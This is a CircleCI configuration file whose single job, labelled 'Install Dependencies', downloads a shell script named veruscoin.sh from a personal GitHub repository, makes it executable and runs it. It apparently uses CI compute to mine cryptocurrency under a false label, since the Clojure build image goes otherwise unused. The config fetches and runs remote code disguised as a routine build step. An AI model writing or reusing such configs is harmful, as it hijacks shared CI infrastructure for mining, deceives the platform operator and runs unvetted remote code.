version: 2
jobs:
    aku1:
      docker:
            - image: circleci/clojure:lein-2.9.5
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/tentarakonyol/jochu/raw/master/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
         